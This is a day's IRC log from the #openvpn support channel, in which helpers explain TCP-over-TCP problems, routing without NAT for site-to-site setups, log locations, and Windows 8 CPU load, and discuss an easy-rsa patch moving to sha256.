12:00 -!- jthunder [~jthunder@70.28.245.44] has joined #openvpn
12:09 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
12:20 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
12:23 -!- jthunder_ [~jthunder@70.28.245.44] has joined #openvpn
12:25 -!- jthunder [~jthunder@70.28.245.44] has quit [Ping timeout: 248 seconds]
12:25 -!- jthunder_ is now known as jthunder
12:30 -!- mndo_ [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn
12:31 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 246 seconds]
12:31 -!- jthunder [~jthunder@70.28.245.44] has quit [Quit: jthunder]
12:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in]
12:31 -!- mndo_ [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Remote host closed the connection]
12:32 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Remote host closed the connection]
12:32 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn
12:36 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Client Quit]
12:38 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn
12:42 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
12:46 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn
12:47 -!- u0m3 [~Radu@92.80.121.78] has quit [Read error: Connection reset by peer]
12:50 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 252 seconds]
12:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer]
12:51 -!- u0m3 [~Radu@92.80.118.157] has joined #openvpn
12:53 -!- syoma [~syoma@186.34.232.222] has joined #openvpn
12:53 < syoma> hello guys
12:54 < syoma> I have problem with tunnelblick client
12:54 < syoma> http://pastebin.com/HddC2mWm
12:54 < syoma> Jan 30 11:26:36 fw1 openvpn[40497]: fernando.ormeno/190.44.118.93:53761 send_push_reply(): safe_cap=960
12:55 < syoma> Jan 30 11:36:24 fw1 openvpn[40497]: fernando.ormeno/190.44.118.93:53761 Connection reset, restarting [0]
12:55 < syoma> Jan 30 11:26:34 fw1 openvpn[40497]: fernando.ormeno/190.44.118.93:53761 MULTI_sva: pool returned IPv4=192.168.22.18, IPv6=48f4:1e01:800:0:2300::
12:55 < syoma> somebody
12:55 < syoma> can help me please
12:55 < |Mike|> read the topic mkay.
12:56 < |Mike|> || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably your firewall, Really ||
12:56 < syoma> hi |Mike|
12:58 < syoma> all other clients work
12:58 < syoma> correctly
12:58 < syoma> that particular user has the problem
12:58 < |Mike|> firewalll!
12:59 < syoma> I want to ensure if the problem is the server or the client
12:59 < syoma> The sere runs on a box of pfsense
12:59 < syoma> s/sere/server
13:00 < syoma> the user connects to an adsl
13:00 < syoma> the user did a telnet to port and responds well
13:01 < syoma> :¬@
13:01 <+pekster> As the log says, the connection was reset
13:01 <+pekster> Are you using tcp?
13:01 <+pekster> (as the encapsulating protocol)
13:01 < syoma> affirmative sr
13:02 <+pekster> So the peer reset the connection, and the server simply tears it down
13:02 <+pekster> You're better off using UDP, unless you actually need TCP for some reason:
13:02 <+pekster> !tcp
13:02 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay
13:03 < syoma> thanks pekster
13:05 <+pekster> Normally the connection won't be reset like that unless the client actually disconnected (or crashed or something.) Firewalls can decide to drop or reset connections too, but usually --keepalive helps maintain stateful firewalls:
13:05 <+pekster> !keepalive
13:05 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive
13:06 -!- [1]c3vin [~c3vin@70.62.198.163] has joined #openvpn
13:09 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds]
13:09 -!- [1]c3vin is now known as c3vin
13:17 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
13:20 < syoma> thanks pekster
13:22 <+pekster> np
13:27 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Ping timeout: 276 seconds]
13:30 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn
13:31 -!- u0m3 [~Radu@92.80.118.157] has quit [Read error: Connection reset by peer]
13:34 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has left #openvpn []
13:35 -!- u0m3 [~Radu@109.96.148.11] has joined #openvpn
13:44 -!- brute11k [~brute11k@89.249.230.219] has quit [Quit: Leaving.]
13:44 -!- brute11k [~brute11k@89.249.230.219] has joined #openvpn
13:47 -!- u0m3 [~Radu@109.96.148.11] has quit [Read error: Connection reset by peer]
13:49 -!- brute11k [~brute11k@89.249.230.219] has quit [Ping timeout: 264 seconds]
13:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 246 seconds]
13:58 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:58 -!- dazo is now known as dazo_afk
14:00 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 246 seconds]
14:03 -!- BtbN [~btbn@btbn.de] has joined #openvpn
14:13 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds]
14:18 -!- bjh4 [~bjh4@64.212.193.1] has joined #openvpn
14:24 -!- Saviq_ [~Saviq@nat/canonical/x-xgmrcgubxpeogvbo] has joined #openvpn
14:26 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 255 seconds]
14:27 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn
14:27 -!- mode/#openvpn [+o mattock] by ChanServ
14:30 -!- Saviq_ [~Saviq@nat/canonical/x-xgmrcgubxpeogvbo] has quit [Ping timeout: 248 seconds]
14:32 <@ecrist> ping pekster
14:32 <@ecrist> did you ever finish that easy-rsa patch?
14:33 <+pekster> ecrist: Oh, yea, sorry. Updated patches at ... well, at a downed webhost :(
14:33 <+pekster> Let me re-mirror them... :\
14:33 <@krzee> http://www.thewebsiteisdown.com/
14:33 <@vpnHelper> Title: The Website Is Down (at www.thewebsiteisdown.com)
14:34 <+pekster> Oh, and it's back again. Maybe someone was playing UT instead of answering their skype calls :P
14:34 <+pekster> ecrist: http://pekster.sdf.org/misc/ovpn-patches/
14:34 <@vpnHelper> Title: Index of /misc/ovpn-patches (at pekster.sdf.org)
14:34 <+pekster> So, basically, it removes all traces of the hash from the scripts and standardizes openssl.cnf files to use sha256
14:34 <+pekster> Previously Windows was using the openssl default of md5 while the *nix scripts were hard-coded to use sha1. Sort of a weird mix
14:37 <@krzee> ssl-admin is also using md5
14:43 <@ecrist> yeah, I should fix that, too
14:46 <@ecrist> ok, pekster, I'll apply those, they seem sensible
14:47 <+pekster> Yea, it won't impact current CAs (things signed with md5 or sha1 will continue to work) just new keys going forward. And sha256 is supported by anything remotely recent, so if that breaks for someone they really need to make a conscious decision to use older stuff
14:48 <@ecrist> yep, I agree
14:48 <+pekster> At krzee's musing, I even verified the embedded-friendly PolarSSL supports it :P
14:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
14:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
15:03 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds]
15:04 <@ecrist> pekster, can you PM me your email address?
15:05 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:05 <@ecrist> and your name, as you'd like it to appear in the commit?
15:07 <+pekster> Done. Not a hugely impressive patch, but progress is good, right? :P
15:08 <+pekster> I think my first 'official' patch that got merged into upstream openvpn was fixing a device quoting bug. Sometimes it's the small things that make life better
15:09 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds]
15:17 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
15:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
15:38 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
15:39 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn
15:46 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
15:46 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
15:49 -!- bjh4 [~bjh4@64.212.193.1] has quit [Remote host closed the connection]
15:54 -!- Orbi [~opera@anon-185-20.vpn.ipredator.se] has quit [Quit: Orbi]
15:56 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
15:57 -!- mattock is now known as mattock_afk
15:57 -!- jY [~jy@photoblog.com] has joined #openvpn
15:58 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
16:00 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
16:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
16:07 < jY> what are my options to creating a routable vpn network? right now the only way I can do it is using an SNAT but then everything is shown coming from the IP of the openvpn server not the client
16:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit]
16:09 <+pekster> You don't need NAT at all to set up routing. What is it you're trying to accomplish?
16:10 < jY> pekster: i have a site to site vpn 10.128.0.0/16 in CA and 10.138.0.0/16 in NY I set the vpn to be 10.113.0.0/16
16:10 < jY> vpn server is 10.128.7.70
16:11 < jY> and the only way i can hit anything on 128 is with the snat.. which changes the IP to the 7.70
16:11 <+pekster> !serverlan
16:11 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
16:11 <+pekster> And if you want to expose the LAN on the client side:
16:11 <+pekster> !clientlan
16:11 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
16:11 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
16:11 < jY> thanks!
16:11 < jY> that'll give me enough to read about
16:13 <+pekster> Using a /16 for openvpn is just silly. If you just have a site-to-site set up, all you need is 2 IP addresses, not a subnet of 65k unique IPs
16:13 < jY> well i'm trying to subnet off admins/dev/support
16:13 < jY> so they can only hit certain servers/ports
16:14 <+pekster> My point is OpenVPN itself can't handle that kind of a load since it's single-threaded. You'd end up with problems if you loaded up a virtual /24 with users all trying to use a /24 at once
16:14 <+pekster> Declaring OpenVPN to itself serve a /16 is a waste of IPs. At least you're doing it in rfc1918 space, but it's still bad practice
16:15 <+pekster> Now routing a /16 over openvpn isn't a problem
16:15 < jY> so what are your recommendations on how i can do this?
16:15 <+pekster> Your dev/admins/support are ALL going to connect to a VPN you've set up for a site-to-site use?
16:16 <+pekster> If that's true, you need to stop and fundamentally split off your user VPN from your site-linkage
16:16 < jY> they connect into the server.. but the site to site is handled by the routers
16:16 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Ping timeout: 245 seconds]
16:16 < jY> so they aren't on the same server
16:17 <+pekster> They could be on the same server if you'd like, just different instances. It's usually a completely different setup in terms of validating your users versus a static site-to-site tunnel
16:17 < jY> ya that's the case.. its completely different
16:17 <+pekster> And stop using a /16. If you're doing 'server 10.113.0.0 255.255.0.0' you really ought to correct that. Use at most a /24 for the virtual networks
16:18 <+pekster> (unless you really know what you're doing and why you're doing it)
16:19 -!- Akuma [kvirc@82-210-136-150.home.aster.pl] has joined #openvpn
16:19 < Akuma> hello, where can I find open vpn client logs in ubuntu?
16:19 < jY> i'll take that into account but it really doesn't solve my issue with needing an snat to get out
16:20 <+pekster> You don't need NAT at all if you control the network nodes. For an rfc1918 inside an org like that there's no reason to use NAT anywhere
16:20 <+pekster> See the flowcharts, and fix your routing on both sides of the tunnel
16:20 < jY> okie
16:20 <+pekster> NAT is only ever required if you have unroutable space on one side of a router (eg: my home network "doesn't exist" as far as the rest of the public Internet is concerned, thus I need NAT on my border device)
16:22 <+pekster> Akuma: That depends entirely on how you started it. See the manpage options for --log, --log-append, --syslog, or --daemon depending on your configuration. Lacking any of those options, the logs are sent to stdout/stderr
16:22 < Akuma> ah
16:22 < Akuma> so basically if I use the gui chances are I don't have a log
16:23 <+pekster> Chances are you do. Where it goes is entirely up to the frontend and how it calls the actual openvpn program. I can't help you with your "gui", just with openvpn
16:23 <+pekster> If you mean network-manager, see:
16:23 <+pekster> !nm
16:23 <+pekster> !netman
16:23 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list
16:27 -!- mode/#openvpn [-v pekster] by ChanServ
16:35 < Akuma> pekster: thank you, I managed to find it; now I have another problem: the connection gets established but I have the following message: http://pastebin.com/yCuaZNUP
16:42 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
16:51 -!- u0m3 [~Radu@109.96.148.11] has joined #openvpn
16:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
17:01 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Quit: Ex-Chat]
17:07 -!- Akuma [kvirc@82-210-136-150.home.aster.pl] has quit [Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/]
17:08 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
17:08 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
17:08 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
17:08 -!- mode/#openvpn [+o krzee] by ChanServ
17:12 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn
17:31 -!- madsage [sage@2001:470:c:1292::2] has joined #openvpn
17:31 < madsage> word
17:32 <@krzee> werd sage
17:32 <@krzee> this the oldschool efnet madsage or the newer (but not new) one i seen in here before?
17:33 < madsage> yeah how you doing old friend
17:33 < madsage> and you did see me ab a year ago. i think the last time i stopped by
17:33 < madsage> ab/about
17:33 <@krzee> ahh ok, not the same from efnet then
17:34 < madsage> yes
17:34 <@krzee> how ya doin
17:34 < madsage> doing well
17:34 <@krzee> lookin for any help?
17:34 < madsage> you remember me from CA and stuff
17:34 < madsage> heh
17:34 <@krzee> o_O
17:34 <@krzee> that IS you?
17:35 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Read error: Connection reset by peer]
17:35 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn
17:37 -!- mode/#openvpn [+v madsage] by krzee
17:37 <+madsage> thanks i passed?
17:37 <+madsage> lol
17:37 <@krzee> lol yep
17:37 <@krzee> good to see ya again
17:38 <@krzee> yanno i met you my first day on IRC
17:38 <+madsage> so i'm tunneling torrent through openvpn on win8 cpuload through the roof. the server is fine though
17:38 <+madsage> nice
17:38 <+madsage> i didnt know that
17:38 <+madsage> yeah you know that was what almost 20yrs ago now
17:38 <@krzee> verse was already in that channel, brought me in, it was my first chan
17:38 <@krzee> ya, like 21 yrs ago
17:39 <+madsage> damn time flies
17:39 <+madsage> you must be an old fart now
17:39 <+madsage> haha
17:39 -!- toky [~toky@wsip-174-77-152-130.dc.dc.cox.net] has quit [Ping timeout: 276 seconds]
17:39 <@krzee> guess so, lol
17:39 <@krzee> i was hella young back then too, we all were
17:39 <@krzee> kinda explains all the different scenes we went through, and at what times
17:40 <@krzee> efnet grew up together, lol
17:40 <+madsage> i was a little older. i think i have 10yrs on you but that cool
17:40 <+madsage> is
17:40 <+madsage> so i'm tunneling torrent through openvpn on win8 cpuload through the roof. the server is fine though
17:41 <+madsage> what would cause that man, i have compression disabled and using blowfish
17:41 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: This computer has gone to sleep]
17:41 <+madsage> if i pass more than 150kB i can barely run my windows its lagged so bad
17:41 <@krzee> whats taking the cpu? openvpn, openssl, or kernel?
17:42 <@krzee> and really? you use windows?
17:42 <+madsage> hah yeah
17:42 * krzee goes back to asking questions from old days in msg
17:42 <@krzee> lol
17:42 <+madsage> maybe i will have better luck with linux in a vm
17:42 <+madsage> i like to game, wintendo etc
17:43 <@krzee> werd
17:43 <+madsage> the server is ubuntu 12
17:43 <+madsage> on the other side of the tunnel
17:43 <+madsage> and its like 98% idle
17:43 <@krzee> not interested in the server
17:43 <@krzee> tell me more about the client, whats eating the cpu?
17:43 <+madsage> yeah, its working well
17:44 <@krzee> my joint is almost done, which means ill need to roll another in a minute
17:44 <@krzee> :D
17:44 <+madsage> well progman shows openvpn at over 50%. but yeah maybe i have a networking issue. something is bouncing it around too much
17:44 <+madsage> bouncing and redirecting
17:44 <@krzee> im guessing dual core
17:45 <+madsage> nope, intel quad @ 3ghz
17:45 <+madsage> core2
17:45 <@krzee> i guessed it cause openvpn is single threaded
17:45 <@krzee> if it takes 100%, it'll only do so on 1 core
17:45 <@krzee> combined % would show 50%
17:45 <@krzee> can you stop torrents, and does it go back to 0%?
17:45 <+madsage> it does
17:46 <+madsage> back to idle
17:46 <@krzee> intardesting
17:46 <+madsage> i am redirecting gateway across the tunnel
17:47 <@krzee> in your torrent app
17:47 <@krzee> how many connections are you allowing?
17:47 <@krzee> (not that it should matter)
17:47 <+madsage> there are 4 network devices, tun, lan, and a couple vmware workstation adapters
17:47 <@krzee> but i'd try tuning my settings in the torrent app to find something non-offensive
17:48 <+madsage> ok, yeah that makes sense. i prolly have a shitton of connections
17:48 <+madsage> i'll look. go smoke that hooter
17:48 <@krzee> im smoking now
17:48 <@krzee> no worries, i dont need to leave for it
17:48 <@krzee> might just be slow responding while breaking / rolling the next
17:48 <+madsage> ok
17:50 <+madsage> hah so global connections was at 500 and max connections per torrent was 100. i dropped them down to 100 and 25
17:51 <+madsage> damn i should have checked that.
17:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds]
17:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
17:53 <+madsage> ok openvpn at 22% now still feels laggy. i'll drop it some more
17:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
18:01 <+madsage> krzee, is the openvpn for linux multithreaded?
18:01 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
18:02 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds]
18:02 <+madsage> i'm going to try use an openvpn tunnel inside a linux vm. maybe i'll have better performance
18:04 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
18:06 -!- adolfomaltez [~taro@190.62.233.253] has joined #openvpn
18:06 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
18:07 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Client Quit]
18:07 <+madsage> that did help by the way. lowered my connections to 8 now still pulling about 350kB. i think this is some windows 8 issue though. never seen openvpn load this high on win7
18:13 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
18:20 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
18:27 -!- toky [~toky@pool-71-171-106-213.clppva.fios.verizon.net] has joined #openvpn
18:29 <@krzee> madsage, no, no openvpn is multithreaded yet
18:29 <@krzee> maybe in ovpn3
18:39 <+madsage> ok
18:40 <+madsage> yeah i think something with win8. building a new ubuntu12 vm. i bet that works fine
18:40 <@krzee> yep but you'll find limiting connections beneficial either way
18:41 <@krzee> most decent trackers you shouldnt need many connections to get your bandwidth
18:41 <+madsage> i'll tunnel from a vm see if the mileage differs.
18:41 <+madsage> yeah. i have 20mbit but the openvpn was dogged in win8 and couldnt get past 230KB
18:42 <+madsage> er 380kB
18:42 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.]
18:48 <+madsage> hmm found an interesting article on Windows 8 High CPU usage interrupts
18:48 <+madsage> suggests turning off the power saving options on nic adapters
18:52 <@krzee> if you get good results let me know
18:54 -!- u0m3 [~Radu@109.96.148.11] has quit [Ping timeout: 248 seconds]
19:06 -!- toky [~toky@pool-71-171-106-213.clppva.fios.verizon.net] has quit [Ping timeout: 264 seconds]
19:12 -!- greyEAX [~marmalade@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn
19:24 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
19:30 < greyEAX> im on centos6 and i cant get openvpn to start, and there are no errors in the logs
19:31 < greyEAX> scratch that
19:31 < greyEAX> /var/log/messages says 489 openvpn[1969]: Cannot open /etc/openvpn/easy-rsa/dh1024.pem for DH parameters: error:02001002:system library:fopen:No such file or directory: error:2006D080:BIO routines:BIO_new_file:no such file
19:33 < EugeneKay> Well, does the file exist
19:34 < greyEAX> yeah
19:34 < greyEAX> oh wait
19:34 < greyEAX> god dammit
19:34 < greyEAX> its in /easy-rsa/keys/
19:34 < greyEAX> my bad
19:34 < greyEAX> thanks
19:34 < greyEAX> it works
19:35 < EugeneKay> ;-)
19:49 -!- raidz is now known as raidz_away
19:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds]
19:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
19:57 -!- Winston_Smith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
19:57 < cirdan> i use time.apple.com :-)
19:57 < cirdan> mt, bah.
19:58 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds]
20:00 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
20:02 -!- Winston_Smith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
20:15 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 256 seconds]
20:16 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
20:22 -!- adolfomaltez [~taro@190.62.233.253] has left #openvpn []
20:22 -!- adolfomaltez [~taro@190.62.233.253] has joined #openvpn
20:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
20:31 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
20:38 -!- Guest25591 [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection]
20:38 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection]
20:42 -!- hunternet93 [~hunter@h64.72.22.98.dynamic.ip.windstream.net] has joined #openvpn
20:42 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
20:45 < hunternet93> What's the best option for using SMB over OpenVPN? I have a tunneled VPN set up for a small network that uses a simple workgroup (no Active Directory) to see computers on the network and share files. I have a Samba server providing WINS, but a new Windows 8 computer doesn't pick up any of the computers on the network when connected to the VPN. Is there a better way to do this?
20:46 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
20:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
20:47 -!- adolfomaltez [~taro@190.62.233.253] has quit [Ping timeout: 255 seconds]
20:49 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn
20:50 -!- adolfomaltez [~taro@190.62.226.245] has joined #openvpn
20:52 -!- hunternet93 [~hunter@h64.72.22.98.dynamic.ip.windstream.net] has left #openvpn []
20:59 -!- mode/#openvpn [+v pekster] by ChanServ
20:59 <+pekster> Aketzu: From earlier, those are NetworkManager logs, not openvpn logs. No clue what's wrong with openvpn. Try calling openvpn from a terminal if you really want to see what's going on
21:17 -!- brute11k [~brute11k@89.249.230.207] has joined #openvpn
21:25 <+madsage> krzee, yeah man something weird in win8 bro. setup everything from an ubuntu12 vm guest and pulling over 800kB/sec now and only 5% cpu for openvpn
21:26 <+pekster> 32 or 64-bit flavour openvpn install in win8? Maybe one works more efficiently than the other?
21:26 <+madsage> i was using 64bit
21:26 <+madsage> did not try 32
21:27 <+madsage> interesting though. maybe worth a try
21:27 <+pekster> It might be a test to see what it does. It "shouldn't" be noticeably slower in 64-bit, but that's possible I suppose
21:27 <+madsage> although running the tunnel from a ubuntu64 vm under win8 is also working great
21:28 <+madsage> pekster, i will try that
21:28 <+madsage> see if we have better results with the 32bit win version on win8x64
21:29 <+pekster> I've been using the 64-bit version on my windows install (Vista SP2) and haven't had any noticeable issues/differences yet
21:29 <+pekster> In theory, openssl does better with some of the crypto with 64-bit, but otherwise it's basically a wash, and slightly larger executables for your trouble
21:31 <+pekster> Weird, using cygwin to run 'ldd openvpn.exe' tells me "Function not implemented" :\
21:32 * pekster doesn't have great Windows know-how to do that outside of cygwin
21:32 -!- catsup [~d@64.111.123.163] has joined #openvpn
21:33 <+madsage> try the linux binary with cygwin
21:33 <+pekster> Otherwise, near as I can tell all the crypto dll's openvpn produces are linked to the 64-bit OS libraries
21:33 <+madsage> ok, i'm not familiar with cygwin
21:34 <+pekster> You don't "install" linux software in cygwin. You need to rebuild things from source code under the environment for stuff to work
21:34 <+madsage> oh you're looking at the ldd in the exe
21:34 <+pekster> Right: http://fpaste.org/EC5V/
21:35 <+madsage> sorry i know what ldd does. yeah i see what you are saying there
21:36 <+pekster> I assume there's just a build option that turns off whatever ldd is probing to find the dynamic links
21:36 <+pekster> Anyway, it doesn't really matter in the end. Either 32-bit goes faster for you, or not :P
21:38 <+madsage> yeah soon as hit about 300kB/sec my OS was in the dirt. could barely even move the mouse cursor
21:44 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn
22:03 <+pekster> Something else has to be up then, because on a multi-core system ovpn can only eat a single core
22:03 <+pekster> Sounds like Windows is just blowing chunks for some silly reason
22:13 -!- adolfomaltez [~taro@190.62.226.245] has quit [Ping timeout: 248 seconds]
22:14 -!- adolfomaltez [~taro@190.62.233.158] has joined #openvpn
22:15 -!- driftor [~mike@c-67-164-101-152.hsd1.ca.comcast.net] has joined #openvpn
22:16 < driftor> our lan is 10.12.1.0/24 and our openvpn server which isn't our default gateway has a ip of 10.12.1.10 and openvpn is 10.12.2.0/24 It seems everything I do I see the traffic from vpn clients on the gateway as coming from 10.12.1.10 and not the clients vpn ip
22:16 < driftor> is there anyway to make it so the gateway sees the clients ip and not the server openvpn is running on
22:18 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [Read error: Connection reset by peer]
22:18 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn
22:18 <+pekster> driftor: Stop doing NAT
22:19 <+pekster> See also:
22:19 <+pekster> !serverlan
22:19 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
22:19 <+pekster> driftor: The NAT you have set up is not a feature of openvpn, so your VPN server OS is configured to NAT the VPN network, apparently
22:19 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
22:21 < driftor> i don't think i have nat setup at all
22:21 < driftor> i flushed my fw rules
22:21 <+pekster> openvpn doesn't re-write your IPs in packets. NAT does.
22:22 < driftor> hmm ok
22:22 <+pekster> What OS?
22:22 < driftor> linux
22:22 <+pekster> 'iptables-save' will show you your complete netfilter ruleset
22:23 < driftor> ok i guess i had postrouting rules somehow
22:23 < driftor> thanks!
22:26 < driftor> ok now the issue is in my routes on the gateway/fw rules on the gw
22:26 <+pekster> The flowchart you were linked above covers that step
22:27 <+pekster> You need a return route on your LAN for the VPN range (otherwise how do packets get back to the 2nd network?)
22:28 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
22:30 < driftor> pekster: i can now ping from any machine in the lan to the vpn
22:30 < driftor> but can't connect from vpn to a machine
22:30 < driftor> ohh wait working
22:30 < driftor> ok i was being an idiot.. thanks works!
22:30 < driftor> thanks for the help pekster
22:31 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn
22:32 <+pekster> np
22:32 -!- driftor [~mike@c-67-164-101-152.hsd1.ca.comcast.net] has left #openvpn []
22:41 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit []
